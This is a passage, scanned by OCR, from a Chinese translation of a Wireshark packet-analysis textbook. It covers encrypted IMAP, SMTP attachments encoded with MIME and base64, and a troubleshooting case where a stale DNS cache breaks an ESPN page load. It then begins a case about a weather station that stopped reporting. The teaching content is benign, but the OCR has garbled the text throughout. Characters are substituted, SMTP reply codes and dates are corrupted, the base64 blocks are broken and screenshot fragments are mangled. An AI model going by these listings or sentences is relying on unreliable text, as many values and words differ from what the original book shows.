取 使 用 TLS 【〈 传 输 层 安全 ) 协议 完成 。 当 查看 这 些 数 据 包 ， 或 者 尝试 跟 
蹊 TCP 流 时 〈 见 图 9-34) ， 你 会 发 现 内 容 不 具备 可 读 性 ， 目 的 是 防止 邮 
件 人 彼 恶 意 用 户 截 获 ， 避 人 免 数 据 支持 和 咒 探 的 发 生 。 


顾 Wireshark . Follow TCP Stream (tcp.stream eq 1) . mail_receiver_server_3 


+ OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS LOGINDISABLED] Dovecot (Ubuntu) 人 ^ 
d 


ready. 
1 STARTTLS 
1 OK Begin TLS negotiation now. 


ootfc i e.local0.. 
1512232186147. 
25122221861470e1.0...U. 
.Dovecot mail server1.9 
..U. . . .mail921.9 
..U. . . .mail1921#9! 
-rootBc > a e.local8.."0 





ed 


ee te De 
eM :L130 99).5. 


| | eg 忆 





ee ey es Ee ,ey 二 
er es Ey 


15 chient pktls} 16 seryer pktls} 30 turms. 
‘Entire conversation (6202 bytes) v Show data as |ASCII we Stream 
Find: Find Next 


Hide this stream | Print Save as... Close Help 








图 9-34 ”客户 闹 下 载 邮件 过 程 使 用 加 窗 IMAP 传 输 


最 后 ， 在 这 些 数 据 包 被 接收 后 ， 不 同 域内 两 个 用 户 之 间 的 邮件 友 送 
过 程 承 完成 了 。 


9.4.3 ”使 用 SMTP 发 送 附 件 


在 设计 SMTP 计 时 从 未 计划 使 其 成 为 一 种 传输 文件 的 途径 ， 但 由 于 
使 用 邮件 友 壕 文件 的 便捷 性 ， 办 此 它 成 为 了 很 多 人 的 首选 文件 共 至 方 
式 。 让 我 们 使 用 一 个 简短 的 实例 ， 从 数据 包 层 面 分 析 SMTP 的 文件 传输 


在 抓 取 文件 mail_sender_attachment.pcapng 中 ， 用 户 使 用 客户 六 
(172.16. 16.225) 辣 同一 网 络 内 男 一 个 用 户 发 送 邮 件 ， 本 地 SMTP 服务 
价位 于 172.16.16.221。 这 封 邮件 包含 一 些 文本 内 容 ， 以 及 一 个 图 片 文件 
附件 。 


使 用 SMTP 发 送 附 件 与 发 送 文 本 没有 太 多 区 别 。 它 们 都 只 是 回 服务 
侣 发 送 数据 ; 尽管 过 程 中 经 稼 会 使 用 一 些 特 殊 编 本 ， 我 们 仍 使 用 DATA 
命令 进行 数据 传送 。 请 打开 抓 包 文件 ， 跟 中 SMTP 传 输 的 TCP 流 ， 介 看 
这 一 操作 过 程 。TCP 流 如 图 9-35 所 示 。 


本 例 的 通信 过 程 在 开始 部 分 与 之 前 的 场景 类 似 ， 包 括 服务 识 列 和 可 
用 协议 信息 交换 。 当 客户 剖 准 备 传输 邮件 信息 时 ， 它 会 提供 友 件 方 地 址 
和 收 件 方 地 址 ， 并 及 送 DATA 命 令 ， 通 知 服务 右 分 配 用 于 接收 邮件 数据 的 
绥 神 区 。 从 这 部 分 开始 出 现 了 少许 差异 。 


在 之 前 的 例子 中 ， 客 户 端 将 文本 直接 传输 至 服务 右 ， 然 后 传输 完 
成 。 在 本 例 中 ， 除 了 明文 文本 信息 之 外 ， 客 户 端 还 需要 发 送 图 片 附件 的 
二 进 制 数据 。 为 了 实现 这 个 目的 ， 客 户 端 将 内 容 类 型 标记 
为 multipart/mixed， 以 ----------- 
-656467686361666566676666 介 作 为 文本 信息 和 二 进 制 数据 的 分 界 
线 。 这 告知 服务 右 ， 传 输 的 邮件 内 容 包 含 多 种 类 型 的 数据 ， 每 种 数据 类 
型 有 特定 的 MIME 类 型 和 编码 方式 ， 各 种 类 型 的 数据 使 用 指定 的 边界 值 
分 隔 。 通 过 这 各 机制， 当 男 一 个 邮件 客户 端 接收 邮件 时 ， 基 于 分 界线 和 
A 指定 的 MIME 类 型 、 编 码 方式 ， 接 收 妆 能 够 知道 如 何 解 析 
件数 据 。 


在 本 例 中 ， 邮 件数 据 包 含 两 部 分 。 第 一 部 分 古 邮 件 文本 ， 内 容 类 型 
为 text/plain 信 。 在 此 之 后 ， 我 们 能 看 到 一 个 分 隐 标 记 和 第 二 部 分 的 起 始 
合 。 第 二 部 分 包含 图 片 文件 ， 内 容 类 型 为 jmage/jpeg 人 个 。 同 样 值得 注 
意 的 是 ，Content-Transfer-Encoding 值 设 为 base64 人 全 ， 这 表示 数据 
需要 使 用 base 64 解 码 。 余 下 的 数据 包 中 包含 编码 过 的 图 厂 文 件 @。 


是 Wireshark . Follow TCP Stream (tcp.stream eq 0) . mail_ sender attachmment 


228 mail8l ESMTP Postfix (Ubuntu) 

EHLO [172.16.16.225] 

258-mail81 

238-PIPELINING 

258-SIZE 18248868 

258-VRFY 

258-ETRN 

258-STARTTLS 

258-ENHANCEDSTATUSCODES 

2508-8BITMIME 

258 DSN 

MAIL FROM:<sanders@skynet.]local> SIZE=76692 
259 2.1.8 Ok 

RCPT TO:<ppaf@skynet. local> 

250 2:1:5 Ok 

DATA 

354 End data with <CR><LF>.<CR><LF> 

To: ppa@skynet. local 

From: Chris Sanders <sanders@skynet.local> 
subject: New Coworker 

Message-ID: <56849222.4888689@skynet.local> 
Date: Wed, 38 Dec 2815 21:25:38 -8@588 
User-Agent: Mozilla/5.8 (Windows NT 18.0; WOWBA4; rv:38.68) Gecko/28186018]1 
Thunderbird/38.5.8 

MIME-Version: 1.8 

Content-Type: multipart/mixed; ©@ 
boundary="------------ 858407888381008580878888”" 


This is a multi-part message in MIME format. 
8584078883818885888789888 

Content-Type: text/plain; charset=utf-8; format=flowed 四 

Content-Transfer-Encoding: 7bit 


A new guy started this week. There is something different about him, but 
I can 七 quite figure it out. Every time he sees me he asks for my 
clothes, my boots, and my motorcycle. I don't even own a motorcycle! I 
took a quick picture and have attached it here. Have you seen this guy 
before? 


9506040709803010005960706006 全 
Content-Type: image/jpeg; @ 
name=" newEuy.jpE-” 
Content-Transfer-Encoding: base64 © 
Content-Disposition: attachment:; 
filename=" neweuy .jpeg”™ 


/9j/4Anoskz]JREABAQAAAQABAAD/2wBDAAMCAEMCAEMDAwMEAwMEBQEFBQQEBQoHBwYIDAoN 
DAsKCwsNDhIQDQ4RDgEsLEBYQERMUFRUVDASXGBYUGBIUFRT7 2wBDAQNMEBAUEBQKFBEQKUDQsN 
FBQUFBQUFBOQUFBQUFBQUFBOQUFBQUFBOQUFBOQUFBQUFBOQUFBQUFBOQOUFBQUF BQUFBQUFBT/wAAR 
CAFaAmcDASIAAhEBAxEB/A8OAHwAAAQUBAQOEBAQEAAAwwwwwwuwAECAwQFBEcICQoL/ABQAtRAA 
AEEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGEIFhByJxFDKBKaEIIBKxwRVSefAkM2JyEEKkKk © 
FhcYGRoj]JicoKsooNTY30Dk6QBRFRkdISUPTVFVWV1LhzwmNKZWZnaGJqc3R1ldnd4eXxqDhIWG 
haijipKT1JWW15izmqKkjpKWimp6ipqrKztLW2t7i5usLDxXMXGx8jJytLTINXW19jz2uHi4+T1 
sufo6erx8vP69fb3+Pn67BQAHWwEAAwEBAQEBAQEBAQAAAAAwmAECAwQFBEcICQoLASBQAtREA 
AEECEAQDBACcFBEAQOAAQOJ3AAECAXEEBSEXxBh]JBUQdhcRMiMoEIFEKRobHBCSMzUwAVYnLRChYkK 
NOEl18RCYGRomJygpKjJU2NzgSOKNERUZHSE IJKUIRVV1dYWVpjZGVmzZ2hpanN@dXzZ3eH16goOE 
hYaHiImKKPOU1ZaXxmJmacqOkpaangqKmqsrOetba3uULm6wsPExcbHyMnKetPU1IdbX2Nna4UPK 
ee 放 5 训 
fh h 


24 chert pkifs} 7 Bai ptrfs 12 turns. 


Hide this stream | Print | Save as... | | Close | Help | 

















图 9-35 用户 使 用 SMTP 发 送 附 件 


在 任何 情况 下 ， 本 Base 64 编 码 几 
乎 能 够 被 瞬间 解码 ， 任 何 帘 多 这 一 通信 的 攻击 者 都 能 够 蝶 不 费力 地 获得 
此 图 请 文件 。 如 果 你 , 梧 要 自行 将 图 片 文件 从 抓 外 文件 中 人 六 离 出 来 ， 在 第 
12 草 的 远程 接 入 木马 部 分 ， 有 一 个 类 似 的 场景 一 一 从 基于 HTTP 的 文件 


传输 中 分 离 一 个 图 片 ， 阅 读 了 该 章 市 后 ， 回 到 本 例 的 数据 包 分 析 过 程 ， 
你 可 以 符 试 找 出 这 个 及 件 人 的 神秘 的 新 同事 是 谁 。 


9.5 小结 


这 一 草 介 绍 了 你 在 检查 应 用 层 流 量 时 会 遇 到 的 钊 见 协 议 。 在 下 面 的 
一 草 中 ， 我 们 将 通过 探索 大 量 实 成 场景 ， 来 介绍 一 些 新 的 协议 ， 以 及 我 
们 这 里 所 介绍 协议 的 额外 功能 。 


如 果 希 望 学 习 更 多 关于 协议 的 知识 ， 可 以 阅读 它们 相关 的 RFC 文 
档 ， 或 者 看 一 看 Charles Kozeriok 的 The TCP/IP Guide(No Starch Press， 
2005)。 同 样 也 可 以 看 一 下 本 书 附 录 中 列 出 的 资源 。 


第 10 草 ”基础 的 现实 世界 场 丸 





从 本 章 开 始 ， 我 们 将 深入 到 数据 包 分 析 的 内 池 ， 使 用 Wireshark 分 析 
现实 世界 中 的 网 络 问题 。 在 本 章 第 一 部 分 ， 我 们 将 分 析 网 络 工程 师 、 服 
务 台 技 术 人 员 、 应 用 开发 者 在 日 间 工 作 中 会 过 到 的 场景 全 都 来 自 于 
我 与 同事 们 的 实际 经 验 。 我 们 将 使 用 Wireshark， 奏 看 来 目 Twitter、 
Facebook 和 ESPN 的 流量 ， 观 察 这 些 常 用 的 服务 是 如 何 工 作 的 。 


本 章 第 二 部 分 将 介绍 一 系列 实际 问题 。 针 对 每 一 个 具体 问题 ， 我 挡 
述 了 它们 的 情况 ， 并 把 当时 可 用 的 信息 提供 给 分 析 者 。 在 这 个 基础 上 ， 
转 到 分 析 数 据 包 的 过 程 、 摘 述 捕获 特定 数据 包 的 方法 ， 以 及 分 析 过 程 的 
每 个 步骤 。 分 析 完 成 后 ， 我 将 提供 一 个 完整 的 问题 解决 方案 ， 或 是 指出 
可 能 的 解决 方法 ， 并 总 结 从 中 汲取 的 经 验 教训 。 


目 始 全 终 ， 要 记 住 分 析 是 一 个 非常 动态 的 过 程 ， 并 且 ， 我 用 来 分 析 
每 一 个 场景 的 方法 可 能 跟 你 用 的 不 一 样 。 每 个 人 可 以 用 不 同 的 方法 来 分 
析 。 但 最 重要 的 是 ， 分 析 的 最 终结 来 能 够 解雇 一 个 问题 ， 或 使 你 获得 学 
习 经 驻 。 万 外 ， 本 章 讨 论 的 大 部 分 问题 ， 即 使 不 用 数据 包 虽 探 藤 ， 也 可 
以 解决 。 当 我 初次 学 习 分 析 数 据 包 时 ， 肥 现 反 钊 规 地 使 用 数据 包 分 析 拉 
术 来 得 看 典型 问题 有 很 多 好 处 ， 这 也 是 我 给 你 介绍 这 些 场 景 的 原因 。 


10.1 丢失 的 网 页 内 容 


在 第 一 个 场景 中 ， 我 们 的 用 户 是 Packet Pete， 一 位 从 不 熬夜 ， 导 至 
经 第 钳 过 西海 尾 哥 事 的 大 学 篮球 迷 。 每 天 上 千 ，Pete 打 开 计 算 机 的 第 一 
件 事 是 访问 ESPN， 查 看 前 一 天 上 晚上 的 最 终 比 分 。 





这 个 上 午 ， 当 Pete 浏 览 ESPN 时 ， 他 友 现 加 载 网 页 耗 渍 了 很 长 时 间 ; 
加 载 过 程 终于 完成 时 ， 页 面 丢 失 了 大 部 分 图 片 和 内 容 〈 见 图 10-1) 。 让 
我 们 帮助 Pete 诊 断 这 个 问题 。 











图 10-1 ESPN 页 面 加 载 失 败 


10.1.1 侦 听 线路 


这 个 问题 只 在 Pete 的 计算 机 上 有 发生， 并 没有 影响 到 其 他 人 ， 因 此 我 
们 在 他 的 计算 机 上 进行 抓 包工 作 。 为 此 ， 我 们 将 安 痛 Wireshark， 抓 取 浏 
响 ESPN 网 站 的 流量 。 这 些 数据 包 位 于 http_espn_fail.pcapng 文 件 中 。 


10.1.2 分析 


我 们 知道 ，Pete 的 问题 在 于 ， 他 不 能 浏览 茶 一 个 网 站 ， 所 以 我 们 首 
和 匈 考 谍 HTTP 协 议 。 如 果 你 阅 谈 了 之 前 的 章节 ， 那 么 你 会 对 客户 顺和 服 
务 器 之 加 的 HITP 通 信 有 基本 的 理解 。 我 们 建议 ， 从 客户 端 癌 远程 服务 
器 发 送 HTTP 请 求 的 地 方 开始 分 析 。 你 可 以 使 用 过 滤器 筛选 GET 请 求 数 
据 包 (使 用 http.request.method == "GET") ， 也 可 以 使 用 主 选 单 
中 的 Statics > HTTP > Requests 〈 见 多 10-2) 进行 过 滤 。 





@eee Wireshark . Requests : http_espn_fail 





Topic / ltem 
' HTTP Requests by HTTP Host 
Www.espn.com 
/ 
v espn.go.com 


v cdn.optimizely.com 
/js/310987714.js 
v assets.espn.go.com 
/i/columnists/kapadia_sheil_m.jpg 
了 a4.espncdn.com 
/combiner/i?img=%2Fphoto%2F2014%2F0806%2Fnfl_g_colts5_cr_1296x729.jpg&w=556& 
了 a2.espncdn.com 
/combiner/i?img=%2Fmedia%2Fmotion%2F2016%2F0108%2Fdm_160108_Trainer_shoulc 
了 al.espncdn.com 
/combiner/i?img=%2Fphoto%2F2016%2F0108%2Fsubzero_5x2.png&w=1296&h=518&sce 





Display filter: Enter a display filter ... 


Copy Save as... Close 


图 10-2 ”查看 访问 ESPN 网 站 的 HTTP 请 求 


从 这 个 概 哎 中 看 到 ， 抓 取 的 数据 包 只 包含 7 次 不 同 的 HTTP 请 求 ， 这 
些 请 求 部 与 ESPN 网 站 有 关 。 除 了 一 个 为 大 量 网 站 投放 广告 的 内 容 分 及 
网 络 (CDN) 服务 ， 每 个 请 求 者 在 域名 部 分 包含 字符 串 espn。 在 浏 哎 
人 


在 没有 明确 目标 会 话 的 情况 下 ， 下 一 个 步骤 是 ， 选 择 Statistics > 
Protocol Hierachy 对 抓 包 文 件 进行 协议 分 层 统计 。 这 将 帮助 我 们 定位 非 
预期 的 协议 和 通信 过 程 中 各 种 协议 分 布 情况 的 异 利 〈 见 图 10-3) 。 请 注 
意 ， 协 议 分 层 基 于 当前 的 角 选 条 件 进行 。 为 了 对 整个 抓 包 文件 进行 分 析 
以 获得 期 望 的 结果 ， 请 先 清除 之 前 的 过 小 硕 设 置 。 


| 仿 全 Wireshark .+ Protocol Hierarchy Statistics . http_espn_fail 
| Protocol ¥ Percent Packets Packets Percent Bytes Bytes Bits/s End Packets 
| v Frame 100.0 569 100.0 357205 30k 0 
v Ethernet 100.0 569 100.0 357205 30k 0 
v Internet Protocol Version 4 100.0 569 100.0 357205 30 K 0 
了 User Datagram Protocol 2 14 0.5 1627 136 0 
Domain Name System 2.5 14 0.5 1627 136 14 
了 Transmission Control Protocol 97.5 555 99.5 355578 29k 541 
vv Hypertext Transfer Protocol 2.5 14 2.4 8460 Fe 是 
Portable Network Graphics 0.2 1 0.1 487 41 1 
Line-based text data 0.5 3 0.5 1632 137 3 
JPEG File Interchange Format 0.5 3 0.8 2962 249 3 
| Titer. 
| 记 Help | Copy  。 Close 


图 10-3 ”查看 网 页 浏览 会 话 的 协议 分 层 统计 


协议 分 层 视 图 并 不 复杂 ， 我 们 能 够 很 快 地 状 列 出 ， 会 话 只 涉及 两 个 


应 用 层 协 议 : HITP 和 DNS。 正 如 在 第 9 章 中 学 习 到 的 ，DNS 用 于 将 域名 
转换 为 IP 地 址 。 因 此 ， 当 访问 一 个 网 站 ， 如 ESPN 时 ， 如 果 你 的 系统 没 
有 绥 存 这 个 站 点 的 DNS 记录 ， 则 系统 将 发 送 一 个 DNS 请 求 来 得 询 远 程 网 
站 服务 器 的 卫 地 址 。 当 DNS 服务 返回 了 一 个 可 用 的 卫 地 址 时 ， 则 域名 解 
| 此 时 ，HTTP 通 信 (使 用 TCP 协 议 ) 可 
以 开始 了 了。 


虽然 分 层 统计 结果 看 上 去 并 没有 什么 异 音 ， 但 是 14 个 DNS 数据 包 是 
值得 注意 的 。 一 个 查询 单个 域名 的 DNS 请 求 通常 只 包含 一 个 数据 包 ， 请 
求 啊 应 同样 由 一 个 数据 包 构 成 〈 除 非 啊 应 数据 包 很 大 ， 这 种 情况 下 ， 
DNS 数据 包 将 使 用 TCP 传 输 ) 。 会 话 中 包含 14 个 DNS 数据 包 ， 这 说 明 可 
能 发 生 了 多 达 7 次 的 DNS 请 求 (7 个 请 求 数据 包 + 7 个 响应 数据 包 = 14 个 
数据 包 ) 。 如 图 10-2 所 示 ，Pete 回 7 个 不 同 的 域名 发 起 了 请 求 ， 但 是 他 在 
浏览 器 中 只 输入 了 一 个 URL。 其 他 请 求 是 如 何 产 生 的 呢 ? 


在 理想 状况 下 ， 浏 贤 网 页 只 需要 全 询 到 一 个 服务 各 地 址 ， 然 后 在 一 
次 HTTP 会 话 中 即 可 获取 所 有 的 内 容 。 但 在 实际 情况 中 ， 一 个 网 页 可 能 
提供 多 个 服务 器 上 的 内 容 。 可 能 的 场景 是 ， 全 部 基于 文本 的 内 容 在 一 
处 ， 图 像 内 容 在 万 一 处 ， 内 欧 的 视频 则 在 第 三 个 位 置 。 这 还 不 包括 广 
告 ,广告 可 能 由 位 于 很 多 独立 服务 费 上 的 多 个 提供 丙 肥 放 。 当 HTTP 客 
己 闹 解析 HTML 代 人 码 时 ， 发 现 了 对 其 他 服务 如 上 资源 的 引用 ， 为 了 获取 
引用 的 内 容 ， 客 户 刀 将 答 斌 得 询 相关 的 服务 疹 ， 这 导致 了 额外 的 DNS 碍 
询 和 HTTP 请 求 。 这 就 是 在 Pete 访 问 ESPN 时 发 生 的 事情 。 在 他 想 要 查看 
来 自 于 单个 源 的 内 容 时 ，HTML 代 码 中 引用 了 其 他 源 的 内 容 ， 之 后 ， 他 
的 浏览 右 目 动 从 其 他 多 个 域名 请 求 内 容 。 


明和 白 了 这 些 额 外 的 请 求 是 如 何 产生 的 ， 接 下 来 ， 我 们 将 逐个 检 和 三 与 
每 个 请 求 相关 的 会 话 (Statistics > Conversations) 。 图 10-4 所 示 的 会 话 
窗口 为 我 们 提供 了 重要 线索。 


| 9 , Wireshark . Conversations . http_espn_fail 
Ethernet + 1 | IPv4 :8 | IPv6 TCP . 16 UDP -7 
息 Address B Packets Bytes PacketsA 一 B Bytes AmB PacketsB 一 A Bytes B+A Rel Start Duration 
4.2.2.1 172.16.16.154 14 1627 TE 1106 Tt 521 0.000000000 0.663869 
68.71.212.158 172.16.16.154 13 2032 6 1200 Te 832 0.027167000 90.875181 
69.31.75.194 172.16.16.154 19 9949 10 8942 9 1007 0.579477000 90.659273 
72.21.91.8 172.16.16.154 92 70 k 49 67 K 43 3170 0.526867000 60.553187 
| 72.246.56.35 172.16.16.,154 247 196 k 134 188 k 113 8315 0.527902000 90.806341 
72.246.56.83 172.16.16.154 30 20 k 15 19 k 15 1518 0.659868000 45.344878 
172.16.16.154 199.181.133.61 61 49k 24 1953 37 47 k 0.238547000 91.083551 
172.16.16.154 203.0.113.94 93 6774 93 6774 0 0 0.430071000 94.593597 





Name resolution Limit to display filter 





Help Copy ~ Follow Stream... Graph... Close 


图 10-4 查看 耳 间 会 话 


我 们 之 前 发 现 浏览 器 进行 了 7 次 DNS 请 求 ， 以 及 相应 的 7 次 HITP 请 
求 。 在 这 个 前 提 下 ， 我 们 可 以 推断 ， 有 7 个 对 应 的 IP 间 会 话 ， SN Ts ‘SE 
际 情况 并 非 如 此 。 这 里 出 现 了 8 个 会 话 。 应 该 如 何 解 释 这 个 情况 ? 


一 种 可 能 性 是 ， 抓 包 文 件 被 一 个 与 本 例 中 问题 无 关 的 会 话 “ 污 染 ”。 
确保 分 析 工 作 不 被 无 关 的 通信 扰乱 是 很 重要 的 ， 但 是 这 并 不 是 这 个 会 话 
中 出 现 问 题 的 原因 。 如 果 仔 细 检 碍 每 一 个 HTTP 请求， 并 留意 请 求 的 目 
的 耳 地 址 ， 你 会 发 现存 在 一 个 会 话 ， 没 有 对 应 的 HITP 请 求 。 这 个 会 话 
的 双方 为 Pete 的 计算 机 〈172.16.16.154) 和 远程 IP 203.0.113.94。 这 个 会 
话 在 图 10-4 的 最 后 一 行 被 列 出 。 我 们 注意 到 ，Pete 的 计算 机 发 送 了 6774 
字 节 至 未 知 服务 器 〈203.0.113.94) ， 但 是 收 到 了 0 字 节 ， 这 值得 我 们 去 
下 人 


现在 ， 人 沛 选 并 查看 这 个 会 话 〈 在 会 话 上 右 击 ， 并 选择 Apply As 
Filter > Selected > A<->B) ， 然 后 ， 运 用 TCP 的 知识 来 确定 错误 位 置 。 


在 正常 的 TCP 通 信 中 ， 我 们 期 望 看 到 一 个 标准 的 SYNSYN/ACK- 
ACK 握 手 序 列 。 在 本 例 中 ，Pete 的 计算 机 加 203.0.113.94 及 送 了 一 个 SYN 
数据 包 〈 见 图 10-5， ， 但 是 我 们 没有 看 到 SYN/ACK 啊 应 。 不 仪 如 此 ， 
Pete 的 计算 机 还 回 不 可 用 的 目的 服务 嚣 发送 了 多 个 SYN 数 据 包 ， 最 终 导 
致 了 他 的 机 器 发 送 TCP 重 传 数据 包 。 我 们 将 在 第 11 章 中 具体 讨论 TCP 重 
传 ， 此 处 的 关键 是 ， 一 个 主机 发 送 了 数据 包 ， 但 是 从 未 接收 到 啊 应 。 碍 
看 时 间 栏 ， 我 们 发 现 ， 重 传 持续 了 95s， 并 且 没 有 任何 响应 。 在 网 络 通 
信 中 ， 这 堪 称 包 速 。 





0. Time Source Destination Protocol Length Info 
25 0.430071 172.16.16.154 203.09.113.94 TCP 78 64862 ”86 [SYN] Seq=6 Win=65535 Len=0 MS5=1460 WS=32 TSvaL=1101093668 TSec.. 
26 0.430496 172,16,16,.154 203,0,113,.94 TCP 78 64863 ~” 88 [SYN] Seq=8 Win=65535 Len=@ M55=1460 WS=32 TSvaL=1101093668 TSec.。 
27 0.431050 172.16.16.154 203,0.113.94 TCR 78 64864 = 80 [SYN] Seq=6 Win=65535 Len=@ MS5=1460 WS=32 TSval=1101093669 TSec.。 
39 0.500663 172.16.16.154 203,0.113.94 TCP 78 64865 =» 80 [SYN] Seq=6 Win=65535 Len=@ M55=1460 WS=32 TSvaL=1101093737 TSec.。 
40 0.500873 172.16.16.154 203.0.113.94 TCP 78 64866 =» 80 [SYN] Seq=b Win=65535 Len=@ MSS=146@ WS=32 TSvaL=1101093737 TSec.. 
[ 70 0.553964 172.16.16.154 203.0.113.94 TCP 78 64869 ~ 80 [SYN] Seq=b Win=65535 Len=0 M55=1460 WS=32 TSvaL=1101093787 TSec.. 


863 = 80 [SYN] 5eq=9 Win=65535 L 
+ 80 [SYN] Seq=0 Win=65535 Len= 
”86 [SYN] Seq=@ Win=65535 Len=8 MSS=1468 WS=32 ,- 


BE 
~” 806 [SYN] Seq=0 Win=65535 Len=0 MSS=1460 W5=32 .- 
=- 80 [SYN] Seq=0 Win=65535 Len=0 MSS=1460 WS=32 .. 

! 462 2.461157 "16.16. :0. = issi ~ 80 [SYN] Seq=0 Win=65535 Len=0 MSS=1468 WS=32 .. 
! 463 2.461157 172.16.16.154 203.0.113.94 isSsi ~ 80 [SYN] Seq=@ Win=65535 Len=8 MSS=1468 WS=32 .- 





图 10-5 ”查看 非 预 期 的 连接 


我 们 识别 了 7 次 DNS 请 求 、7 次 HTTP 请 求 和 8 个 IP 间 会 话 。 在 确定 抓 
包 文 件 并 没有 人 被 颌 外 数据 污染 的 情况 下 ， 我 们 有 理由 相信 ， 神 秘 的 第 8 
个 IP 则 会 话 可 能 是 Pete 加 和 载 网 页 绥 慢 并 最 终 失 败 的 原因 。 由 于 某 些 原 


因 ，Pete 的 计算 机 试 冬 与 一 个 不 存在 或 未 近 供 服务 的 设备 进行 通信 。 广 
了 了 解 这 个 情况 出 现 的 原因 ， 我 们 不 会 得 看 抓 包 文件 中 的 数据 包 : 相 
反 ， 我 们 会 考虑 文件 之 外 的 内 容 。 


当 Pete 浏 览 ESPN 网 页 时 ， 他 的 浏览 器 识别 了 其 他 域名 上 的 内 容 。 为 
了 获取 这 些 内 容 数 据 ， 他 的 计算 机 发 起 DNS 人 查询 来 获得 这 些 域名 的 IP 地 
址 ， 之 后 ， 向 这 些 目 标 卫 发 起 TCP 连 接 ， 从 而 发 送 HTTP 请 求 并 获取 网 
页 内 容 。 对 于 与 203.0.113.94 的 会 话 ， 并 没有 对 应 的 DNS 请 求 。 那 么 ， 
Pete 的 计算 机 是 怎样 获得 这 个 地 址 的 呢 ? 


如 果 你 记得 我 们 在 第 9 章 中 关于 DNS 的 讨论 ， 或 是 熟悉 DNS， 那 么 
你 就 会 明白 ， 大 部 分 系统 使 用 一 种 DNS 绥 存 机 制 。 这 一 机 制 在 系统 内 建 
本 地 的 域名 与 卫 地 址 间 的 映射 缓 仓 ， 当 访问 已 经 缓存 DNS 记录 、 经 季 
访问 的 域名 时 ， 系 纺 将 使 用 本 地 的 映射 缓存 ， 而 不 及 起 DNS 请 求 。 直 全 
这 些 域名 与 耳 地 址 间 的 映射 过 期 ， 才 进行 新 的 DNS 请 求 以 获得 域名 的 卫 
地 址 。 然 而 ， 如 采 域 名 与 卫 的 映射 天 系 变更 了 了， 但 是 东 个 设备 并 没有 及 
起 新 的 DNS 请 求 以 获得 新 的 地 址 ， 那 么 ， 在 下 座 访 问 这 一 域名 时 ， 访 设 
备 将 答 试 连接 一 个 无 效 的 地 址 。 


在 Pete 的 例子 中 ， 残 出 现 了 这 种 情况 。Pete 的 计算 机 缓存 了 有 茶 一 个 
为 ESPN 了 网 站 提供 内 容 的 主机 的 域名 解析 信息 。 由 于 绥 存 信息 的 存在 ， 
因此 获取 页 面 内 容 时 没有 进行 DNS 请 求 ， 这 导致 他 的 系统 试图 继续 连接 
旧 的 地 址 。 然 和 而， 这 个 地 址 已 经 不 再 为 提供 HTTP 服 务 。 作 为 结果 ， 请 
求 超时 ， 并 且 内 容 加 载 失 败 。 


对 于 Pete 而 言 全 得 庆 竺 的 征 ， 手动 清除 DNS 缓存 ， 只 需要 在 命令 
行 中 他 击 很 短 的 命令 即 可 。 或 者 ， 他 可 以 等 待 几 分 钟 ， 在 DNS 缓存 记录 
过 期 、 新 的 DNS 请 求 完成 后 ， 有 再 竹 试 访问 ESPN 网 站 。 


10.1.3 ”学 到 的 知识 


为 了 获得 “此 培 基 大 学 以 90 分 击败 了 杜 殉 大 学 ”的 消 奶 ， 我 们 做 了 很 
多 工作 ， 但 是 这 一 过 程 使 我 们 对 网 络 主机 间 的 关系 有 了 更 深层 次 的 理 
解 。 在 这 个 场景 中 ， 我 们 过 过 俘 看 与 请 求 的 多 个 相关 数据 提供 上 以 及 出 
现在 抓 包 文件 中 的 会 话 ， 定 位 了 问题 并 得 出 了 解决 方 采 。 我 们 从 定位 到 
通信 中 少许 的 不 一 致 信息 入 手 ， 发 现 了 客户 端 与 ESPN 的 一 个 CDN 服 务 


独 之 间 连 接 不 可 用 的 问题 。 


浏览 一 系列 数据 包 以 及 现 一 些 看 起 来 可 笑 的 数据 ， 这 样 简单 的 方式 
不 太 适 用 于 实际 的 问题 诊断 工作 。 即 使 是 处 理 最 简单 的 问题 ， 也 需要 使 
用 Wireshark 的 分 机 和 统计 特性 对 大量 的 抓 包 文件 进行 处 理 ， 以 定位 寞 部 
ea 对 于 在 数据 包 层 面 顺利 完成 故障 处 理 
很 重要 。 


如 朱 力 了 解 ， 正 币 情 况 下 浏 斋 郁 和 ESPN 之 间 的 通信 过 程 是 怎样 
的 ， 你 可 以 使 用 浏览 春 访 问 这 个 网 站 ， 同 时 进行 抓 包 ， 并 芝 试 识 刚 出 所 
有 人 负 贡 内 容 分 友 的 服务 占 。 


10.2 无 啊 应 的 气象 服务 


第 二 个 场景 还 是 和 我 们 的 朋友 Packet Pete 有 关 。 他 有 众多 爱好 ， 包 
括 气 象 学 一 一 他 上 自 认 为 是 业余 气象 学 家 ,每 隔 几 小 时 束 会 但 看 天 气 现状 
和 天 气 了 预报 。 他 并 不 只 是 依赖 于 本 地 新 闻 的 天 气 了 预报 ; 他 还 在 目 己 家 的 
外 面 运营 了 一 个 小 型 气象 站 ， 并 将 报告 数据 上 传人 宇 WunderGround， 用 
于 数据 汇总 和 人 查阅。 今天 ，Pete 检 查 气 象 站 ， 以 查看 昨 晚 的 降温 情况 ， 
结果 发 现 ， 目 午夜 开始 ， 气 象 站 超过 9 小 时 未 同 WunderGround 发 送 报告 
( 见 图 10-6) 。 
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图 10-6 ”气象 站 在 9 小 时 内 未 发 送 报告 


10.2.1 侦 听 线路 


在 Pete 的 网 络 中 ， 和 气象 站 被 挂 在 房 项 上 ， 与 屋内 的 接收 喜 通 过 射频 
连接 。 接 收 需 通 过 路 由 需 接 入 网 络 ， 然 后 将 统计 数据 发 送 至 互联 网 上 的 
WunderGround 服 务 器 。 这 个 结构 如 图 10-7 所 示 。 

气象 站 


(@) 


射频 连接 






气象 数据 接收 名 路 由 器 dd 
172.16.16.154 172.16.16.1 WunderGround 服 务 中 


图 10-7 气象 站 网 络 结构 


接收 绒 有 一 个 简易 的 Web 管 理 界面 ， 当 Pete 登 录 管 理 界面 时 ， 只 发 
现 了 一 条 与 上 次 数据 同步 时 间 有 关 的 加 密 消 息 ， 除 此 之 外 ， 没 有 其 他 可 
用 于 故障 处 理 的 信息 一 一 这 个 软件 不 提供 任何 详细 的 错误 日 志 。 由 于 接 
收 器 是 气象 站 设备 的 通信 枢纽 ， 因 此 抓 取 发 往 或 来 自 于 接收 器 的 数据 包 
对 于 诊断 问题 是 有 意义 的 。 由 于 这 是 一 个 家 庭 网 络 ， 因 此 家 用 路 由 器 可 
能 不 文 持 端口 镜像 功能 。 我 们 最 好 使 用 廉价 的 侦 听 霹 或 使 用 ARP 绥 存 投 
